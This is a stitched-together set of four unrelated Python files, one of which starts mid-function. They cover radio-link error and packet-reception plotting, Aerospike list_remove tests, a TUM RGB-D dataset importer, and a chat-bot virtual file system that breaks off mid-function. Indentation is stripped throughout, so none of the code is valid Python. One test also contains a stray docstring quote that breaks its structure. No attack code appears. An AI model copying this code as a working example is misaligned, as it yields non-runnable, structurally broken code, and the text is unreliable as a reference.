max_length = min(max_length, max(map(len, xors)))
bits_array = [0] * max_length * 8
for xor in xors:
for ii in range(max_length):
for jj in range(8):
bits_array[ii * 8 + jj] += 1 if xor[ii] & (1 << (7 - jj)) else 0
else:
bits_array = []
self._write_to_raw_file('xor_bits_array', bits_array)
error_sum = self._read_from_raw_file('bit_error_sum')
        if error_sum is None:
error_sum = sum(self.get_array_of_property('bit_errors'))
self._write_to_raw_file('bit_error_sum', error_sum)
if len(bits_array):
if error_sum >= 2:
normed_bits_array = map(lambda b: float(b)/error_sum, bits_array)
else:
normed_bits_array = bits_array
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
lines = ax.plot(range(len(normed_bits_array)), normed_bits_array)
pylab.setp(lines, color='k', linewidth=0.6)
# ax.grid(b=True, which='major', color='0.90', linestyle='-')
ax.set_axisbelow(True)
ax.add_patch(Rectangle((0, 0), 12*8, 10000, color='0.80'))
ax.set_xlim(xmin=0, xmax=max_length*8)
ax.set_ylim(ymin=0, ymax=0.0025)
plt.xticks(range(12*8, max_length*8, 64), (range(0, max_length*8, 64)))
ax.set_ylabel("Frequency of bit errors", fontsize=18)
ax.set_xlabel("Bit position", fontsize=18)
return fig, ax, {'errors': bits_array, 'sum': error_sum}
def get_time_values_for_key(self, key):
nkey = key.lower().replace(" ", "_")
results = {'time': [], 'values': []}
if self.links is None:
print "Requiring time values for key '{}'".format(key)
self.links = self.link_file.get_links_for_selector(self.selector)
for link in self.links:
for rx in link.rx:
if nkey in rx and 'timestamp' in rx:
results['time'].append(rx['timestamp'])
results['values'].append(rx[nkey])
return results
def get_mean_time_values_for_key(self, key, lower=None, upper=None):
nkey = key.lower().replace(" ", "_")
data = self._read_from_raw_file(nkey)
if data is None:
values = self.get_time_values_for_key(nkey)
data = {'time': [], 'values': []}
if len(values['time']) > 0:
data['time'].append(values['time'][0])
data['values'].append([values['values'][0]])
data_index = 0
delta_half = datetime.timedelta(minutes=1)
reference_time = data['time'][0] + delta_half + delta_half
for time_index in range(len(values['time'])):
if values['time'][time_index] <= reference_time:
data['values'][data_index].append(values['values'][time_index])
else:
data['time'].append(reference_time - delta_half)
data['values'].append([values['values'][time_index]])
data_index += 1
reference_time += delta_half + delta_half
data['time'] = map(lambda dt: int(dt.strftime("%s")), data['time'])
self._write_to_raw_file(nkey, dict(data))
else:
data = dict(data)
if len(data['time']) > 0:
data['time'] = map(lambda dt: datetime.datetime.fromtimestamp(dt), data['time'])
data.update({'mean': [], 'std_l': [], 'std_u': []})
for ii in range(len(data['time'])):
mean = np.mean(data['values'][ii])
std = np.std(data['values'][ii], ddof=1)
data['mean'].append(mean)
data['std_l'].append(max(lower, (mean - std)) if lower is not None else mean - std)
data['std_u'].append(min(upper, (mean + std)) if upper is not None else mean + std)
return data
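# Worked example of the binning above (a sketch; timestamps illustrative):
# with delta_half = 1 minute, samples are grouped into two-minute windows
# and each window is labelled with its centre (reference_time - delta_half).
# Samples at 12:00:00, 12:00:30 and 12:01:30 all land in the window
# labelled 12:01:00; the first sample after 12:02:00 opens the next window.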
def create_mean_time_plot_for_key(self, key, nax=None):
nkey = key.lower().replace(" ", "_")
data = self.get_mean_time_values_for_key(key, 0 if 'errors' in nkey else None)
if len(data['time']) > 0:
if nax is None:
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
else:
ax = nax
ax.set_ylim(ymin=min(self.ranges[nkey]), ymax=max(self.ranges[nkey]))
if 'temperature' in nkey:
key += " ($^\circ$C)"
ax.set_ylabel(key, fontsize=18)
if 'temperature' not in nkey:
ax.plot_date(data['time'], data['std_u'], c='0.5', linestyle='-', markersize=0, linewidth=1)
std_line, = ax.plot_date(data['time'], data['std_l'], c='0.5', linestyle='-', markersize=0, linewidth=1)
mean, = ax.plot_date(data['time'], data['mean'], c='k', linestyle='-', markersize=0, linewidth=1.75)
if 'temperature' not in nkey:
ax.legend([mean, std_line],
['Mean', '1 std deviation'],
loc= 2 if 'errors' in nkey else 3,
prop={'size': 12})
if nax is None:
fig.autofmt_xdate()
return ax
def create_burst_error_plot(self):
burst_error = self._read_from_raw_file('burst_errors')
# burst_error = None
if burst_error is None:
if self.links is None:
print "Requiring array of property for key 'burst_errors'"
self.links = self.link_file.get_links_for_selector(self.selector)
all_burst_errors = []
for link in self.links:
for rx in link.rx:
if 'burst_errors' in rx:
if rx['bit_errors'] > 0:
all_burst_errors.append(rx['burst_errors'])
burst_error = []
if len(all_burst_errors) > 0:
# bit errors per symbol
burst_error = [ [] for _ in range(16+1) ]
for ii in range(len(burst_error)):
for error in all_burst_errors:
burst_error[ii].append(error[ii])
self._write_to_raw_file('burst_errors', burst_error)
if len(burst_error) > 0:
one_bit_errors = float(sum(burst_error[1])) / len(burst_error[1])
relative_burst_errors = [ [0.0] * len(burst_error[length]) for length in range(len(burst_error)) ]
confidence_intervals = [[0] * (16+1), [0] * (16+1)]
sum_burst_error = [0] * (16 + 1)
mean_burst_error = [0] * (16 + 1)
df_burst_error = [0] * (16 + 1)
sd_burst_error = [0] * (16 + 1)
for length in range(1, len(burst_error)):
# normalize over mean of 1 bit errors
for sample in range(len(burst_error[length])):
relative_burst_errors[length][sample] = float(burst_error[length][sample]) / one_bit_errors
sum_burst_error[length] = sum(burst_error[length])
# confidence intervals
n, min_max, mean, var, skew, kurt = stats.describe(relative_burst_errors[length])
dev = math.sqrt(var) / math.sqrt(len(burst_error[length]))
dof = len(burst_error[length]) - 1
mean_burst_error[length] = mean
sd_burst_error[length] = dev
df_burst_error[length] = dof
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
ax.plot(range(len(sum_burst_error)), sum_burst_error)
# ax.errorbar(range(len(mean_burst_error)), mean_burst_error, yerr=stats.t.ppf(0.95, df_burst_error)*sd_burst_error,
# fmt='', ecolor='k', capthick=2)
ax.set_yscale('log')
ax.set_xlim(xmin=1, xmax=16)
ax.set_ylim(ymin=0, ymax=10e7)
ax.set_ylabel('Accumulated occurrences', fontsize=18)
ax.set_xlabel('Error burst length', fontsize=18)
return fig, ax
def create_prr_plot(self, nax=None):
prr = self._read_from_raw_file('prr')
if prr is None:
# we need to know how many messages we sent, to be able to normalize all PRRs
time_messages = self.get_time_values_for_key('timeout')
# if the key 'bit_errors' is in the rx message, then there was no timeout, and the message is valid
# this can therefore be used for two PRRs: general PRR and error-free PRR
time_bit_errors = self.get_time_values_for_key('bit_errors')
# we are also interested in how good the coder was able to salvage the payload and make a PRR out of that
# if no code was used, this will be empty
time_decoded_bit_errors = self.get_time_values_for_key('decoded_bit_errors')
# if we use a coder, we need to compare the bit errors in the coded area with the decoded area
time_coded_bit_errors = self.get_time_values_for_key('coded_bit_errors')
prr = {'time': [],
'sent': [1],
'received': [0],
'received_without_error': [0],
'coded_without_error': [0],
'decoded_without_error': [0]}
if len(time_messages['time']) > 0:
# - for all messages we are only interested in how many messages per minute were sent
# - for general PRR we are interested in how many messages per minute were received
# - for error-free PRR we are interested in how many messages per minute were received without error
prr['time'].append(time_messages['time'][0])
prr_index = 0
bit_error_index = 0
coded_error_index = 0
decoded_error_index = 0
delta_half = datetime.timedelta(seconds=7, milliseconds=500)
reference_time = prr['time'][0] + delta_half + delta_half
for time_index in range(len(time_messages['time'])):
if time_messages['time'][time_index] <= reference_time:
prr['sent'][prr_index] += 1
while (bit_error_index < len(time_bit_errors['time']) and
time_bit_errors['time'][bit_error_index] <= reference_time):
prr['received'][prr_index] += 1
prr['received_without_error'][prr_index] += 1 if time_bit_errors['values'][bit_error_index] == 0 else 0
bit_error_index += 1
while (decoded_error_index < len(time_decoded_bit_errors['time']) and
time_decoded_bit_errors['time'][decoded_error_index] <= reference_time):
prr['decoded_without_error'][prr_index] += 1 if time_decoded_bit_errors['values'][decoded_error_index] == 0 else 0
decoded_error_index += 1
while (coded_error_index < len(time_coded_bit_errors['time']) and
time_coded_bit_errors['time'][coded_error_index] <= reference_time):
prr['coded_without_error'][prr_index] += 1 if time_coded_bit_errors['values'][coded_error_index] == 0 else 0
coded_error_index += 1
else:
prr['time'].append(reference_time)
prr['sent'].append(1)
prr['received'].append(0)
prr['received_without_error'].append(0)
prr['decoded_without_error'].append(0)
prr['coded_without_error'].append(0)
prr_index += 1
reference_time += delta_half + delta_half
prr['time'] = map(lambda dt: int(dt.strftime("%s")), prr['time'])
self._write_to_raw_file('prr', dict(prr))
else:
prr = dict(prr)
if len(prr['time']) > 0:
prr['time'] = map(lambda dt: datetime.datetime.fromtimestamp(dt), prr['time'])
# normalize for all sent messages
for ii in range(len(prr['time'])):
all_sent = prr['sent'][ii]
if all_sent > 0:
prr['received'][ii] = float(prr['received'][ii]) / all_sent
prr['received_without_error'][ii] = float(prr['received_without_error'][ii]) / all_sent
prr['decoded_without_error'][ii] = float(prr['decoded_without_error'][ii]) / all_sent
# prr['coded_without_error'][ii] = float(prr['coded_without_error'][ii]) / all_sent
if nax is None:
fig, ax = plt.subplots(1)
x, y = fig.get_size_inches()
fig.set_size_inches(x * 0.625, y * 0.625)
else:
ax = nax
zeros = np.zeros(len(prr['time']))
ones = np.ones(len(prr['time']))
legend = {'patches': [], 'labels': []}
if sum(prr['decoded_without_error']) > 0 and False:  # decoded-error overlay disabled for now
ax.fill_between(prr['time'], y1=prr['decoded_without_error'], y2=ones, where=prr['decoded_without_error'] < ones, color='r', interpolate=True)
legend['patches'].append(Rectangle((0, 0), 1, 1, fc="r"))
legend['labels'].append("Decoded with error")
ax.fill_between(prr['time'], y1=prr['received'], y2=ones, where=prr['received'] < ones, color='0.65', interpolate=True)
legend['patches'].append(Rectangle((0, 0), 1, 1, fc="0.65"))
legend['labels'].append("Reception timeout")
# if sum(prr['coded_without_error']) > 0:
# rx_wo_error, = ax.plot_date(prr['time'], prr['coded_without_error'], markersize=0, c='k', linestyle='-', linewidth=0.8)
# else:
rx_wo_error, = ax.plot_date(prr['time'], prr['received_without_error'], markersize=0, c='k', linestyle='-', linewidth=0.8)
legend['patches'].append(rx_wo_error)
legend['labels'].append("Received without Error")
ax.set_ylim(ymin=0, ymax=1)
ax.set_ylabel('PRR', fontsize=18)
ax.legend(legend['patches'],
legend['labels'],
loc=3,
prop={'size': 12})
if nax is None:
fig.autofmt_xdate()
return ax
def create_time_plot(self, key='lqi'):
nkey = key.lower().replace(" ", "_")
values = self.get_time_values_for_key(nkey)
if len(values['time']) > 0:
fig, ax = plt.subplots(1)
ax.set_ylim(ymin=min(self.ranges[nkey]), ymax=max(self.ranges[nkey]))
lines = plt.plot_date(values['time'], values['values'], markersize=1, c='k')
# ax.grid(b=True, which='major', color='0.66', linestyle='-')
ax.set_ylabel(nkey)
fig.autofmt_xdate()
return fig, ax
def create_time_plots_for_multiple_keys(self, keys):
plots = len(keys)
fig, axarr = plt.subplots(plots, sharex=True)
fig.set_size_inches(8 * 0.625, 0.625 * plots * 5.5)
for ii in range(plots):
key = keys[ii].lower().replace(" ", "_")
if 'prr' in key:
self.create_prr_plot(axarr[ii])
else:
self.create_mean_time_plot_for_key(keys[ii], axarr[ii])
fig.autofmt_xdate()
self.logger.debug("Saving Plot to file: '{}_{}'".format(self.basename, "-".join(keys)))
plt.savefig("{}_{}.pdf".format(self.basename, "-".join(keys)), bbox_inches='tight', pad_inches=0.1)
plt.close()
return axarr
def create_plot_for_key(self, key):
nkey = key.lower().replace(" ", "_")
plot = None
if nkey in ['rssi', 'lqi', 'bit_errors', 'byte_errors', 'temperature']:
plot = self.create_mean_time_plot_for_key(key)
elif nkey in ['hist_rssi', 'hist_lqi', 'hist_bit_errors', 'hist_byte_errors']:
plot = self.create_histogram_plot_for_key(nkey)
elif nkey in ['xor']:
plot = self.create_xor_plot()
elif nkey in ['prr']:
plot = self.create_prr_plot()
elif nkey in ['burst_errors']:
plot = self.create_burst_error_plot()
return plot
def save_plot_for_key(self, key):
plot = self.create_plot_for_key(key)
if plot is not None:
self.logger.debug("Saving Plot to file: '{}_{}'".format(self.basename, key))
plt.savefig("{}_{}.pdf".format(self.basename, key), bbox_inches='tight', pad_inches=0.1)
# plt.savefig("{}_{}.png".format(self.basename, key))
plt.close()
def save_all_plots(self):
keys = ['LQI', 'RSSI', 'Bit Errors', 'Byte Errors', 'Burst Errors', 'Temperature',
'Hist RSSI', 'Hist LQI', 'Hist Bit Errors', 'Hist Byte Errors',
'Xor',
'PRR']
for key in keys:
self.save_plot_for_key(key)
def save_all_cached_plots(self):
keys = ['LQI', 'RSSI', 'Bit Errors', 'Byte Errors', 'Burst Errors', 'Temperature',
'Hist RSSI', 'Hist LQI', 'Hist Bit Errors', 'Hist Byte Errors',
'Xor',
'PRR'
]
for key in keys:
self.save_plot_for_key(key)
# self.create_time_plots_for_multiple_keys(['PRR', 'Bit Errors', 'LQI', 'RSSI', 'Temperature'])
def save_plot_to_file(self, plot, filename):
if self.links and plot:
self.logger.debug("Saving Plot to file: '{}'".format(filename))
plot.savefig(os.path.join(os.path.dirname(__file__), '..', 'plots', filename), bbox_inches='tight')
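# A minimal sketch of the caching convention used above (names hypothetical):
# every derived series is stored under a normalised key in the JSON side
# file "<basename>_<A-B|B-A>_raw.txt", so "Bit Errors" and "bit_errors"
# address the same cache entry:
#
#   >>> "Bit Errors".lower().replace(" ", "_")
#   'bit_errors'
#
# Deleting the *_raw.txt file therefore forces all plots to be recomputed
# from the link file on the next run.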
|
|
# -*- coding: utf-8 -*-
import pytest
import random
aerospike = pytest.importorskip("aerospike")
from .test_base_class import TestBaseClass
from aerospike import exception as e
class TestListRemove(object):
@pytest.fixture(autouse=True)
def setup(self, request, as_connection):
keys = []
for i in range(5):
key = ('test', 'demo', i)
rec = {'name': 'name%s' %
(str(i)),
'contact_no': [i, i + 1],
'city': ['Pune', 'Dehli']}
self.as_connection.put(key, rec)
keys.append(key)
key = ('test', 'demo', 2)
self.as_connection.list_append(key, "contact_no", [45, 50, 80])
keys.append(key)
def teardown():
"""
Teardown method.
"""
for key in keys:
try:
as_connection.remove(key)
except e.RecordNotFound:
pass
request.addfinalizer(teardown)
def test_pos_list_remove_with_correct_parameters(self):
"""
Invoke list_remove() to remove a list element with correct parameters
"""
"""
key = ('test', 'demo', 1)
status = self.as_connection.list_remove(key, "contact_no", 0)
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert bins == {
'city': ['Pune', 'Dehli'], 'contact_no': [2], 'name': 'name1'}
def test_pos_list_remove_with_correct_policy(self):
"""
Invoke list_remove() to remove a list element with a correct policy
"""
key = ('test', 'demo', 2)
policy = {
'timeout': 1000,
'retry': aerospike.POLICY_RETRY_ONCE,
'commit_level': aerospike.POLICY_COMMIT_LEVEL_MASTER
}
status = self.as_connection.list_remove(
key, 'contact_no', 2, {}, policy)
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert bins == {
'city': ['Pune', 'Dehli'], 'contact_no': [2, 3], 'name': 'name2'}
# Negative Tests
def test_neg_list_remove_with_no_parameters(self):
"""
Invoke list_remove() without any mandatory parameters.
"""
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove()
assert "argument 'key' (pos 1)" in str(
typeError.value)
def test_neg_list_remove_with_incorrect_policy(self):
"""
Invoke list_remove() with incorrect policy
"""
key = ('test', 'demo', 1)
policy = {
'timeout': 0.5
}
try:
self.as_connection.list_remove(key, "contact_no", 0, {}, policy)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "timeout is invalid"
def test_neg_list_remove_with_nonexistent_key(self):
"""
Invoke list_remove() with non-existent key
"""
if self.server_version < [3, 15, 2]:
pytest.skip("Change of error beginning in 3.15")
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 30
length = random.randint(minLength, maxLength)
key = ('test', 'demo', ''.join(map(lambda unused:
random.choice(charSet),
range(length))) + ".com")
with pytest.raises(e.RecordNotFound):
self.as_connection.list_remove(key, "contact_no", 0)
def test_neg_list_remove_with_nonexistent_bin(self):
"""
Invoke list_remove() with non-existent bin
"""
key = ('test', 'demo', 1)
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 10
length = random.randint(minLength, maxLength)
bin_name = ''.join(map(lambda unused:
random.choice(charSet), range(length))) + ".com"
try:
self.as_connection.list_remove(key, bin_name, 585)
except e.BinIncompatibleType as exception:
assert exception.code == 12
def test_neg_list_remove_with_extra_parameter(self):
"""
Invoke list_remove() with extra parameter.
"""
key = ('test', 'demo', 1)
policy = {'timeout': 1000}
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove(
key, "contact_no", 1, {}, policy, "")
assert "list_remove() takes at most 5 arguments (6 given)" in str(
typeError.value)
def test_neg_list_remove_policy_is_string(self):
"""
Invoke list_remove() with policy is string
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", 1, {}, "")
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "policy must be a dict"
def test_neg_list_remove_key_is_none(self):
"""
Invoke list_remove() with key is none
"""
try:
self.as_connection.list_remove(None, "contact_no", 0)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "key is invalid"
def test_neg_list_remove_bin_is_none(self):
"""
Invoke list_remove() with bin is none
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, None, 1)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Bin name should be of type string"
def test_neg_list_remove_with_negative_index(self):
"""
Invoke list_remove() with negative index
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", -56)
except e.OpNotApplicable as exception:
assert exception.code == 26
def test_neg_list_remove_meta_type_integer(self):
"""
Invoke list_remove() with metadata input is of type integer
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_remove(key, "contact_no", 1, 888)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Metadata should be of type dictionary"
def test_neg_list_remove_index_type_string(self):
"""
Invoke list_remove() with index is of type string
"""
key = ('test', 'demo', 1)
with pytest.raises(TypeError) as typeError:
self.as_connection.list_remove(key, "contact_no", "Fifth")
assert "an integer is required" in str(typeError.value)
|
|
# Copyright (c) 2017, John Skinner
import os.path
import xxhash
import cv2
import util.associate
import metadata.camera_intrinsics as cam_intr
import metadata.image_metadata as imeta
import util.transform as tf
import core.image_entity
import dataset.image_collection_builder
def make_camera_pose(tx, ty, tz, qx, qy, qz, qw):
"""
The TUM dataset uses a different coordinate frame to the one I'm using, which is the same as the Libviso2 frame.
This function converts dataset ground-truth poses to transform objects.
Thankfully, it's still a right-handed coordinate frame, which makes this easier.
Frame is: z forward, y right, x down
:param tx: The x coordinate of the location
:param ty: The y coordinate of the location
:param tz: The z coordinate of the location
:param qx: The x part of the quaternion orientation
:param qy: The y part of the quaternion orientation
:param qz: The z part of the quaternion orientation
:param qw: The scalar part of the quaternion orientation
:return: A Transform object representing the world pose of the current frame
"""
return tf.Transform(
location=(tz, -tx, -ty),
rotation=(qw, qz, -qx, -qy),
w_first=True
)
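# Worked example of the frame change (values illustrative): a TUM pose with
# location (tx, ty, tz) = (1.0, 2.0, 3.0) and orientation
# (qx, qy, qz, qw) = (0.0, 0.0, 0.0, 1.0) maps to
# location (tz, -tx, -ty) = (3.0, -1.0, -2.0) and w-first rotation
# (qw, qz, -qx, -qy) = (1.0, 0.0, 0.0, 0.0).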
def read_image_filenames(images_file_path):
filename_map = {}
with open(images_file_path, 'r') as images_file:
for line in images_file:
if line.startswith('#'):
# This line is a comment
continue
parts = line.split(' ')
if len(parts) >= 2:
timestamp, relative_path = parts[0:2]
filename_map[float(timestamp)] = relative_path.rstrip() # To remove trailing newlines
return filename_map
def read_trajectory(trajectory_filepath):
"""
Read the ground-truth camera trajectory from file
:param trajectory_filepath:
:return: A map of timestamp to camera pose.
"""
trajectory = {}
first_pose = None
with open(trajectory_filepath, 'r') as trajectory_file:
for line in trajectory_file:
if line.startswith('#'):
# This line is a comment, skip and continue
continue
parts = line.split(' ')
if len(parts) >= 8:
timestamp, tx, ty, tz, qx, qy, qz, qw = parts[0:8]
pose = make_camera_pose(float(tx), float(ty), float(tz),
float(qx), float(qy), float(qz), float(qw))
# Find the pose relative to the first frame, which we fix as 0,0,0
if first_pose is None:
first_pose = pose
trajectory[float(timestamp)] = tf.Transform()
else:
trajectory[float(timestamp)] = first_pose.find_relative(pose)
return trajectory
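# Note that the first ground-truth pose is pinned to the origin: the first
# timestamp maps to the identity Transform(), and every later pose is
# expressed relative to that first frame via first_pose.find_relative(pose).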
def associate_data(root_map, *args):
"""
Convert a number of maps key->value to a list of lists
[[key, map1[key], map2[key] map3[key] ...] ...]
The list will be sorted in key order
Returned inner lists will be in the same order as they are passed as arguments.
The first map passed is considered the reference point for the list of keys.
:param root_map: The first map to associate
:param args: Additional maps to associate to the first one
:return:
"""
if len(args) <= 0:
# Nothing to associate, flatten the root map and return
return sorted([k, v] for k, v in root_map.items())
root_keys = set(root_map.keys())
all_same = True
# First, check if all the maps have the same list of keys
for other_map in args:
if set(other_map.keys()) != root_keys:
all_same = False
break
if all_same:
# All the maps have the same set of keys, just flatten them
return sorted([key, root_map[key]] + [other_map[key] for other_map in args]
for key in root_keys)
else:
# We need to associate the maps, the timestamps are a little out
rekeyed_maps = []
for other_map in args:
matches = util.associate.associate(root_map, other_map, offset=0, max_difference=1)
rekeyed_map = {root_key: other_map[other_key] for root_key, other_key in matches}
root_keys &= set(rekeyed_map.keys())
rekeyed_maps.append(rekeyed_map)
return sorted([key, root_map[key]] + [rekeyed_map[key] for rekeyed_map in rekeyed_maps]
for key in root_keys)
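# A minimal worked example (sketch) of the fast path where all maps share
# the same keys:
#
#   >>> associate_data({1.0: 'rgb_a', 2.0: 'rgb_b'},
#   ...                {1.0: 'pose_a', 2.0: 'pose_b'})
#   [[1.0, 'rgb_a', 'pose_a'], [2.0, 'rgb_b', 'pose_b']]
#
# When the timestamps differ slightly, util.associate.associate() matches
# them within max_difference=1 second instead.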
def get_camera_intrinsics(folder_path):
folder_path = folder_path.lower()
if 'freiburg1' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=517.3,
fy=516.5,
cx=318.6,
cy=255.3,
k1=0.2624,
k2=-0.9531,
k3=1.1633,
p1=-0.0054,
p2=0.0026
)
elif 'freiburg2' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=580.8,
fy=581.8,
cx=308.8,
cy=253.0,
k1=-0.2297,
k2=1.4766,
k3=-3.4194,
p1=0.0005,
p2=-0.0075
)
elif 'freiburg3' in folder_path:
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=535.4,
fy=539.2,
cx=320.1,
cy=247.6
)
else:
# Default to ROS parameters
return cam_intr.CameraIntrinsics(
width=640,
height=480,
fx=525.0,
fy=525.0,
cx=319.5,
cy=239.5
)
def import_dataset(root_folder, db_client):
"""
Load a TUM image sequences into the database.
:return:
"""
if not os.path.isdir(root_folder):
return None
# Step 1: Read the meta-information from the files
rgb_path = os.path.join(root_folder, 'rgb.txt')
trajectory_path = os.path.join(root_folder, 'groundtruth.txt')
depth_path = os.path.join(root_folder, 'depth.txt')
if not os.path.isfile(rgb_path) or not os.path.isfile(trajectory_path) or not os.path.isfile(depth_path):
# Stop if we can't find the metadata files within the directory
return None
image_files = read_image_filenames(rgb_path)
trajectory = read_trajectory(trajectory_path)
depth_files = read_image_filenames(depth_path)
# Step 2: Associate the different data types by timestamp
all_metadata = associate_data(image_files, trajectory, depth_files)
# Step 3: Load the images from the metadata
builder = dataset.image_collection_builder.ImageCollectionBuilder(db_client)
for timestamp, image_file, camera_pose, depth_file in all_metadata:
rgb_data = cv2.imread(os.path.join(root_folder, image_file), cv2.IMREAD_COLOR)
depth_data = cv2.imread(os.path.join(root_folder, depth_file), cv2.IMREAD_UNCHANGED)
depth_data = depth_data / 5000 # Re-scale depth to meters
camera_intrinsics = get_camera_intrinsics(root_folder)
builder.add_image(image=core.image_entity.ImageEntity(
data=rgb_data[:, :, ::-1],
depth_data=depth_data,
metadata=imeta.ImageMetadata(
hash_=xxhash.xxh64(rgb_data).digest(),
camera_pose=camera_pose,
intrinsics=camera_intrinsics,
source_type=imeta.ImageSourceType.REAL_WORLD,
environment_type=imeta.EnvironmentType.INDOOR_CLOSE,
light_level=imeta.LightingLevel.WELL_LIT,
time_of_day=imeta.TimeOfDay.DAY,
)
), timestamp=timestamp)
return builder.save()
|
|
# See readme.md for instructions on running this code.
import re
import os
class VirtualFsHandler(object):
def usage(self):
return get_help()
def handle_message(self, message, client, state_handler):
command = message['content']
if command == "":
return
sender = message['sender_email']
state = state_handler.get_state()
if state is None:
state = {}
recipient = message['display_recipient']
if isinstance(recipient, list): # If not a stream, then hash on list of emails
recipient = " ".join([x['email'] for x in recipient])
if recipient not in state:
state[recipient] = fs_new()
fs = state[recipient]
if sender not in fs['user_paths']:
fs['user_paths'][sender] = '/'
fs, msg = fs_command(fs, sender, command)
prependix = '{}:\n'.format(sender)
msg = prependix + msg
state[recipient] = fs
state_handler.set_state(state)
client.send_reply(message, msg)
def get_help():
return '''
The "fs" commands implement a virtual file system for a stream.
The locations of text are persisted for the lifetime of the bot
running, and if you rename a stream, you will lose the info.
Example commands:
```
fs mkdir: create a directory
fs ls: list a directory
fs cd: change directory
fs pwd: show current path
fs write: write text
fs read: read text
fs rm: remove a file
fs rmdir: remove a directory
```
Use commands like `fs help write` for more details on specific
commands.
'''
def test():
fs = fs_new()
user = 'test_user'
fs['user_paths'][user] = '/'
assert is_directory(fs, '/')
for cmd, expected_response in sample_conversation():
fs, msg = fs_command(fs, user, cmd)
if msg != expected_response:
raise AssertionError('''
cmd: %s
expected: %s
but got : %s
''' % (cmd, expected_response, msg))
def sample_conversation():
return [
('cd /', 'Current path: /'),
('cd /home', 'ERROR: invalid path'),
('cd .', 'ERROR: invalid path'),
('mkdir home', 'directory created'),
('cd home', 'Current path: /home/'),
('cd /home/', 'Current path: /home/'),
('mkdir stuff/', 'ERROR: stuff/ is not a valid name'),
('mkdir stuff', 'directory created'),
('write stuff/file1 something', 'file written'),
('read stuff/file1', 'something'),
('read /home/stuff/file1', 'something'),
('read home/stuff/file1', 'ERROR: file does not exist'),
('pwd ', '/home/'),
('pwd bla', 'ERROR: syntax: pwd'),
('ls bla foo', 'ERROR: syntax: ls <optional_path>'),
('cd /', 'Current path: /'),
('rm home', 'ERROR: /home/ is a directory, file required'),
('rmdir home', 'removed'),
('ls ', 'WARNING: directory is empty'),
('cd home', 'ERROR: invalid path'),
('read /home/stuff/file1', 'ERROR: file does not exist'),
('cd /', 'Current path: /'),
('write /foo contents of /foo', 'file written'),
('read /foo', 'contents of /foo'),
('write /bar Contents: bar bar', 'file written'),
('read /bar', 'Contents: bar bar'),
('write /bar invalid', 'ERROR: file already exists'),
('rm /bar', 'removed'),
('rm /bar', 'ERROR: file does not exist'),
('write /bar new bar', 'file written'),
('read /bar', 'new bar'),
('write /yo/invalid whatever', 'ERROR: /yo is not a directory'),
('mkdir /yo', 'directory created'),
('read /yo', 'ERROR: /yo/ is a directory, file required'),
('ls /yo', 'WARNING: directory is empty'),
('read /yo/nada', 'ERROR: file does not exist'),
('write /yo whatever', 'ERROR: file already exists'),
('write /yo/apple red', 'file written'),
('read /yo/apple', 'red'),
('mkdir /yo/apple', 'ERROR: file already exists'),
('ls /invalid', 'ERROR: file does not exist'),
('ls /foo', 'ERROR: /foo is not a directory'),
('ls /', '* /*bar*\n* /*foo*\n* /yo/'),
('invalid command', 'ERROR: unrecognized command'),
('write', 'ERROR: syntax: write <path> <some_text>'),
('help', get_help()),
('help ls', 'syntax: ls <optional_path>'),
('help invalid_command', get_help()),
]
REGEXES = dict(
command='(cd|ls|mkdir|read|rmdir|rm|write|pwd)',
path=r'(\S+)',
optional_path=r'(\S*)',
some_text='(.+)',
)
def get_commands():
return {
'help': (fs_help, ['command']),
'ls': (fs_ls, ['optional_path']),
'mkdir': (fs_mkdir, ['path']),
'read': (fs_read, ['path']),
'rm': (fs_rm, ['path']),
'rmdir': (fs_rmdir, ['path']),
'write': (fs_write, ['path', 'some_text']),
'cd': (fs_cd, ['path']),
'pwd': (fs_pwd, []),
}
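# A short worked example of the dispatch above (sketch): for the message
# 'write /foo hello world', cmd_name is 'write', so the argument regex is
# r'(\S+) (.+)$'; matched against '/foo hello world' it yields the groups
# ('/foo', 'hello world'), which are passed to fs_write(fs, user, ...).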
def fs_command(fs, user, cmd):
cmd = cmd.strip()
if cmd == 'help':
return fs, get_help()
cmd_name = cmd.split()[0]
cmd_args = cmd[len(cmd_name):].strip()
commands = get_commands()
if cmd_name not in commands:
return fs, 'ERROR: unrecognized command'
f, arg_names = commands[cmd_name]
partial_regexes = [REGEXES[a] for a in arg_names]
regex = ' '.join(partial_regexes)
regex += '$'
m = re.match(regex, cmd_args)
if m:
return f(fs, user, *m.groups())
elif cmd_name == 'help':
return fs, get_help()
else:
return fs, 'ERROR: ' + syntax_help(cmd_name)
def syntax_help(cmd_name):
commands = get_commands()
f, arg_names = commands[cmd_name]
arg_syntax = ' '.join('<' + a + '>' for a in arg_names)
if arg_syntax:
cmd = cmd_name + ' ' + arg_syntax
else:
cmd = cmd_name
return 'syntax: {}'.format(cmd)
def fs_new():
fs = {
'/': directory([]),
'user_paths': dict()
}
return fs
def fs_help(fs, user, cmd_name):
return fs, syntax_help(cmd_name)
def fs_mkdir(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path in fs:
return fs, 'ERROR: file already exists'
dir_path = os.path.dirname(path)
if not is_directory(fs, dir_path):
msg = 'ERROR: {} is not a directory'.format(dir_path)
return fs, msg
new_fs = fs.copy()
new_dir = directory({path}.union(fs[dir_path]['fns']))
